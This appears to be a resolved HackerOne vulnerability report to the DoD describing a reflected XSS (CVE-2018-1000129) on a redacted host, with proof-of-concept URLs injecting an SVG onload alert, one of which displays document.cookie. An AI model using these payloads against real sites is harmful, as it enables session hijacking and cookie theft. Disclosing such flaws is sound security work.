[ CVE-2018-1000129 ] RXSS At `https://███████` via the URI
Medium
Vulnerability Details
Hi `DOD` Team,
## System Host(s)
████████
CVE Numbers:
* # CVE-2018-1000129
# POC:
* https://█████%3Csvg%20onload=alert%28'1337'%29%3E?mimeType=text/html
* https://██████████%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
* https://████████%3Csvg%20onload=alert%28document.cookie%29%3E?mimeType=text/html
* ████
## Impact
Attackers can execute scripts in a victim’s browser to steal the user's cookies, hijack user sessions, deface websites, insert hostile content, redirect users, hijack the user’s browser using malware, etc...
Thanks.
Actions
View on HackerOneReport Stats
- Report ID: 2778412
- State: Closed
- Substate: resolved